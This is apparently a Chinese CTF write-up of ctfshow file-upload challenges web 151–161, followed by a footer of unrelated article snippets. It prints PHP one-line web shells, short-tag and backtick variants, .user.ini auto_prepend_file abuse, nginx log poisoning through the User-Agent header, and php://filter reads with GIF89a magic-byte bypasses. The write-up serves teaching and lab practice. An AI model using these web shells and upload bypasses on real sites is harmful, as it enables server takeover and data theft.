ctfshow——文件上传
文章目录
- 文件上传思路
- web 151
- web 152
- web 153
- 知识点
- 解题
- web 154
- web 155
- web 156
- web 157
- web 158
- web 159
- web160
- web 161
文件上传思路
web 151
打开页面显示:前台校验不可靠。说明这题是前端验证。
右键查看源代码,找到与上传点有关的前端代码:
这里使用了一个叫Layui
的组件库,url代表上传接口,accept代表允许上传的文件类型,exts代表允许上传的文件后缀。可见这里前端只允许上传图片类型的文件,且文件后缀名为png。
绕过前端验证的最简单方法就是,上传一个png的webshell,再使用burp抓包更改文件后缀名,再访问上传的webshell。
可见,上传成功~,下一步就是写一个shell<?php @eval($_POST['cmd']);?>
,用webshell连接工具蚁剑去连接上传的webshell。
这里我们详细分析一句话木马,不借助工具获取flag。
- php代码要写在
<?php ?>
中,php解析器才会认出这是php代码; @
符号的意思是不报错,即使执行错误,也不报错;eval()
:把字符串当做PHP代码执行;$_POST['cmd']
接收POST传参,传参的变量名叫cmd
。除了POST传参,还有GET传参
$_GET['cmd']
、全局的传参方法$_REQUEST['cmd']
(不管是GET传参 or POST传参 or FIlE传参 or COOKIE传参)。- php执行系统命令的函数有
system()
、exec()
、shell_exec()
、反撇号。php执行外部命令
web 152
跟前一题一样的
web 153
知识点
自PHP 5.3.0起,PHP支持基于每个目录的INI文件配置,此类文件仅被CGI/Fast SAPI处理。如果PHP以模块化的方式运行在Apache里,则.htaccess
文件有同样效果。除了主php.ini
之外,php还会在每个目录下扫描INI文件,从被执行的PHP文件所在目录开始一直上升到web根目录($_SERVER[‘DOCUMENT_ROOT’]所指定)。如果被执行的php文件在web根目录之外,则只扫描该目录。
配置选项是有权限的。
php.ini
是主要的配置文件,.user.ini
是用户自定义的配置文件且能覆盖php.ini
的内容,php解析器在解析php文件时会扫描.user.ini
的配置。
在.user.ini
风格的 INI 文件中只有具有 PHP_INI_PERDIR 和 PHP_INI_USER 和PHP_INI_ALL模式的 INI 设置可被识别。用人话说就是除了PHP_INI_SYSTEM模式的配置以外都可以在.user.ini中进行重写。两个重要的配置选项:
auto_append_file=filename //相当于在每个php文件尾加上 include(“filename”)
auto_prepend_file=filename //相当于文件头加上 include(“filename”)
利用.user,ini
的方法:保证三个文件(.user.ini
、shell.png
、xx.php
)在同一目录下,再执行该目录下的php文件。例如:
//.user.iniauto_prepend_file=1.png//1.png<?php phpinfo();?>//1.php(任意php文件)
三个文件在一个目录下,就相当于1.php文件开头插入了
include('1.png');
进行文件包含,因为1.png中有php代码,所以经过include之后会执行shell脚本。
解题
此题前后端都检测content-type
值,只允许上传PNG文件。
上传.user.ini
文件,内容为auto_prepend_file=shell.png
上传shell.png文件
从之前可以得知,upload
文件夹下有一个index.php的文件,故访问../upload/index.php?cmd=phpinfo();
,可以看到phpinfo的页面。
web 154
知识点:过滤<?php
绕过方法:使用短标签进行绕过(没有限制条件)。如:
<?php @eval($_GET['cmd']);?> == <?=@eval($_GET['cmd']);?>
此题过滤了
php
这一关键词。使用短标签进行绕过。
pyload:
<?=@eval($_GET['cmd']);?>
web 155
同web 154
web 156
知识点:过滤php
、[]
关键字
绕过方法:
php
关键字被过滤,使用php短标签进行绕过;[]
被过滤,使用{}
进行替换。例如:<?php @eval($_GET['cmd']);?> == <?php @eval($_GET{cmd});?>
payload:
<?=system('cat ../fl*')?>
web 157
在前面的基础上,过滤了{
、;
,而且文件内容不能有php字符串。
绕过方法:
- 过滤
;
,则在短标签里,可以省略;
。例如:
<?php @eval($_GET{cmd});?> == <?php @eval($_GET{cmd})?>
- 过滤
{
,那就不用eval函数接受参数,再执行系统命令,直接用system()
函数执行系统命令。如<?=system(
ls)?>
-cat ../flag.php
==cat ../fl*
payload:
<?=system('cat ../fl*')?>
web 158
同web157
web 159
在前面的基础上,过滤了(
。绕过方法:直接用反撇号
执行系统命令,反撇号就相当于shell_exec()
函数。payload:
<?=`cat ../fl*`?>
web160
在前面的基础上,过滤了反撇号。绕过方法:
-
第一种方法:利用日志包含绕过。就是说有些中间件会将用户访问记录记在日志里,如果将webshell写到日志里,再包含日志,不就可以getshell了吗?操作:
-
同样先上传
.user.ini
文件,内容为auto_prepend_file=shell.png
;
-
上传shell.png文件,文件内容为
<?=include"/var/lo"."g/nginx/access.lo"."g"?>
(log关键词被过滤),且将shell写在UA头中。
- ngnix的日志路径为
/var/log/nginx/access.log
; - php中,可以用
.
进行字符串的拼接;
- 访问
xxx/upload/index.php
.
-
-
第二种方法:因为已经知道flag的位置,通过php伪协议进行文件读取。
- 同样先上传
.user.ini
文件,内容为auto_prepend_file=shell.png
; - 上传shell.png,文件内容为
<?=include"ph"."p://filter/covert.base64-encode/resource=../flag.ph"."p"?>
- 访问
xxx/upload/index.php
,再使用base64进行解码即可。
- 同样先上传
web 161
这关在前面的基础上,还进行文件内容检测(主要是使用getimagesize()
函数进行检测),服务端主要检测文件幻数。其实就是检测文件内容开始的地方,不同后缀名的文件,文件起始的地方是不一样的。
这关很恶心嗷,前端验证只能为png文件,后端检测文件内容必须是gif。
绕过方法:制作图片马,更简单的就是用burp抓包,将你的shell写在文件内容里。
- 先上传
.user.ini
文件,内容为auto_prepend_file=shell.png
(需要加gif文件的文件幻数GIF89a
);
- 上传shell.png,文件内容为
<?=include"ph"."p://filter/covert.base64-encode/resource=../flag.ph"."p"?>
,同样要加文件幻数GIF89a。
- 访问
../upload/index.php
,使用base64进行解码。
相关文章:

ctfshow——文件上传
文章目录 文件上传思路web 151web 152web 153知识点解题 web 154web 155web 156web 157web 158web 159web160web 161 文件上传思路 web 151 打开页面显示:前台校验不可靠。说明这题是前端验证。 右键查看源代码,找到与上传点有关的前端代码:…...

【RocketMQ每日一问】RocketMQ SQL92过滤用法以及原理?
1.生产端 public class SQLProducer {public static int count 10;public static String topic "xiao-zou-topic";public static void main(String[] args) {DefaultMQProducer producer MQUtils.createLocalProducer();IntStream.range(0, count).forEach(i -&g…...
Go语言中的包管理工具之Go Path的使用
GoLang 中常用的包管理的方式 1 )概述 常用的有三种 Go PathGo VendorGo Modules 2 )发展历程 早期go的包管理存在很大缺陷,甚至可以说没有官方统一的包管理工具 一方面官方在努力发布一些实验性的包管理工具。同时也出现了很多社区开发…...
cocos creator(2.4.7版本) webview 可以在上层添加UI控件
实现原理:cocos本身在平台中属于view,所以可以把webview放在底层,以达到目标。 实现过程:参考 cocos creator(2.4.7版本) videoplayer 可以在上层添加UI控件() 需要增加以下过程: …...

2023 年四川省职业院校技能大赛“信息安全管理与评估”样题
2023 年四川省职业院校技能大赛(高等职业教育) “信息安全管理与评估”样题 竞赛需要完成三个阶段的任务,分别完成三个模块,总分共计 1000分。三个模块内容和分值分别是: 第一阶段:模块一 网络平台搭建与设…...
ubuntu2204,mysql8.x安装
ubuntu 2204, MySQL8.x安装 sudo apt-get update sudo apt-get upgrade# 习惯性的先设置一下时区,这里我使用东八区 date -R # 若发现时间正常则无需设置tzselect# 依次选择 4 -> 10 -> 1 -> 1cp /usr/share/zoneinfo/Asia/Shanghai /etc/localtimedate -R# 同步时间…...

CG Magic分享云渲染和本地渲染之间的区别有什么?
无论是效果图渲染还是影视渲染,对于3D设计师来说都是常见的渲染方式就是云渲染和本地渲染。 本地电脑渲染是指将渲染任务分配给本地计算机进行处理,而云渲染是指将渲染任务上传至云端服务器进行处理。 对于一些初入行业的新手朋友来说,会在想…...

【算法与数据结构】763、LeetCode划分字母区间
文章目录 一、题目二、解法三、完整代码 所有的LeetCode题解索引,可以看这篇文章——【算法和数据结构】LeetCode题解。 一、题目 二、解法 思路分析:本题要求为: 1.尽可能多的划分片段2.字母只能出现在一个片段中3.片段连接起来仍然是s&…...

新火种AI|人形机器人敲响上市罗,首日市值高达390亿港元
作者:一号 编辑:彩云 史上第一次!人形机器人在港交所和人类一起敲锣。 12月29日,在港交所现场,熊猫机器人优悠走上舞台,将手中的锣锤递给了优必选创始人、董事长兼CEO周剑,而同周剑一同准…...

SpringMVC框架
SpringMVC 三层架构MVC模式SpringMVC入门案例总结 三层架构 表现层(web) 页面数据的收集,产出页面 业务逻辑层(service) 业务处理 数据访问层(Dao) 数据持久化 MVC模式 SpringMVC 基于Java…...

FreeRTOS——计数型信号量知识总结及实战
1计数型信号量概念 1)计数型信号量相当于队列长度大于1 的队列,因此计数型信号量能够容纳多个资源 2)适用场景: 事件计数: 当每次事件发生后,在事件处理函数中释放计数型信号量(计数值1&#x…...
Linux下Docker Engine安装后的一些配置步骤
一些安装后的配置令Linux主机可以更好地与Docker配合使用。 0x01 以非root用户身份管理Docker Docker守护进程绑定到Unix套接字,而不是TCP端口。默认情况下,root用户拥有Unix套接字,而其他用户只能使用 sudo. Docker守护进程始终以root用户身份运行。 …...
【并发设计模式】聊聊Balking是如何实现以及具体原理
前面的等待唤醒,其实是一个线程等待执行满足条件的逻辑,会一直死等,但是并不是全部的场景都需要死等。比如我们去坐车的时候,公交一直没来,那么就可以不去了。而等待唤醒是公交没来我就等他来了再去。 Guarded Suspen…...
dubbo的一些问题思考
1.dubbo是啥 Dubbo 是一个高性能的 Java RPC(远程过程调用)框架,用于构建分布式服务架构。由阿里巴巴开发并开源,作为一个分布式服务框架,Dubbo 提供了丰富的功能,包括服务治理、远程调用、负载均衡、容错机…...

盛最多水的容器(力扣11题)
例题: 分析: 这道题给出了一个数组,数组里的元素可以看成每一个挡板,要找到哪两个挡板之间盛的水最多,返回盛水量的最大值。这其实是一个双指针问题。 我们可以先固定第一个挡板( i )和最后一个挡板( j ),…...

.babky勒索病毒解密方法|勒索病毒解决|勒索病毒恢复|数据库修复
导言: 网络安全威胁不断进化,其中.babky勒索病毒引起了广泛关注。这篇文章91数据恢复将深入介绍.babky的狡猾特征,以及在遭受其袭击时如何高效地恢复被加密的数据,并提供实用的预防方法。当面对被勒索病毒攻击导致的数据文件加密…...
20240103-通过布局让自己的生活有有意义人生有价值
最近听到看到的一些词 心力、稀缺、卓有成效、知行合一、致良知、心即理、事上练 最近琢磨出这么一个道理,就是任何人做事情其实都有内心趋势和一套适合他自己的内心驱动的方法。我们经常意识不到,我时常也会去寻求做一件事,是不是有特定的…...

JDK17 - 开发者视角,从 JDK8 ~ JDK17 都增加了哪些新特性
目录 前言 一、站在开发视角,从 JDK8 升级到 JDK17 都有哪些新特性 1.1、JDK8 新特性 1.1.1、Optional 类 a)简介 b)使用方法 c)使用场景 1.2、JDK9 新特性 1.2.1、Optional - ifPresentOrElse 解决 if-else 1.2.2、Opt…...
八股文打卡day11——计算机网络(11)
面试题:HTTP多个TCP连接怎么实现? 我的回答: 1.HTTP1.0的时候,一个TCP连接只能进行一次请求响应。可以建立多个连接到服务器,这样就可以同时进行多个请求响应,提高传输效率。 2.HTTP1.1推出了持久连接&am…...

在Android设备上设置和使用隧道代理HTTP
随着互联网的深入发展,网络信息的传递已经成为人们日常生活中不可或缺的一部分。对于我们中国人来说,由于某些特殊的原因,访问国外网站时常常会遇到限制。为了解决这个问题,使用代理服务器成为了许多人的选择。而在Android设备上设…...

测试微信模版消息推送
进入“开发接口管理”--“公众平台测试账号”,无需申请公众账号、可在测试账号中体验并测试微信公众平台所有高级接口。 获取access_token: 自定义模版消息: 关注测试号:扫二维码关注测试号。 发送模版消息: import requests da…...

高频面试之3Zookeeper
高频面试之3Zookeeper 文章目录 高频面试之3Zookeeper3.1 常用命令3.2 选举机制3.3 Zookeeper符合法则中哪两个?3.4 Zookeeper脑裂3.5 Zookeeper用来干嘛了 3.1 常用命令 ls、get、create、delete、deleteall3.2 选举机制 半数机制(过半机制࿰…...
质量体系的重要
质量体系是为确保产品、服务或过程质量满足规定要求,由相互关联的要素构成的有机整体。其核心内容可归纳为以下五个方面: 🏛️ 一、组织架构与职责 质量体系明确组织内各部门、岗位的职责与权限,形成层级清晰的管理网络…...
return this;返回的是谁
一个审批系统的示例来演示责任链模式的实现。假设公司需要处理不同金额的采购申请,不同级别的经理有不同的审批权限: // 抽象处理者:审批者 abstract class Approver {protected Approver successor; // 下一个处理者// 设置下一个处理者pub…...

MySQL:分区的基本使用
目录 一、什么是分区二、有什么作用三、分类四、创建分区五、删除分区 一、什么是分区 MySQL 分区(Partitioning)是一种将单张表的数据逻辑上拆分成多个物理部分的技术。这些物理部分(分区)可以独立存储、管理和优化,…...

【UE5 C++】通过文件对话框获取选择文件的路径
目录 效果 步骤 源码 效果 步骤 1. 在“xxx.Build.cs”中添加需要使用的模块 ,这里主要使用“DesktopPlatform”模块 2. 添加后闭UE编辑器,右键点击 .uproject 文件,选择 "Generate Visual Studio project files",重…...
xmind转换为markdown
文章目录 解锁思维导图新姿势:将XMind转为结构化Markdown 一、认识Xmind结构二、核心转换流程详解1.解压XMind文件(ZIP处理)2.解析JSON数据结构3:递归转换树形结构4:Markdown层级生成逻辑 三、完整代码 解锁思维导图新…...

ui框架-文件列表展示
ui框架-文件列表展示 介绍 UI框架的文件列表展示组件,可以展示文件夹,支持列表展示和图标展示模式。组件提供了丰富的功能和可配置选项,适用于文件管理、文件上传等场景。 功能特性 支持列表模式和网格模式的切换展示支持文件和文件夹的层…...

聚六亚甲基单胍盐酸盐市场深度解析:现状、挑战与机遇
根据 QYResearch 发布的市场报告显示,全球市场规模预计在 2031 年达到 9848 万美元,2025 - 2031 年期间年复合增长率(CAGR)为 3.7%。在竞争格局上,市场集中度较高,2024 年全球前十强厂商占据约 74.0% 的市场…...

路由基础-路由表
本篇将会向读者介绍路由的基本概念。 前言 在一个典型的数据通信网络中,往往存在多个不同的IP网段,数据在不同的IP网段之间交互是需要借助三层设备的,这些设备具备路由能力,能够实现数据的跨网段转发。 路由是数据通信网络中最基…...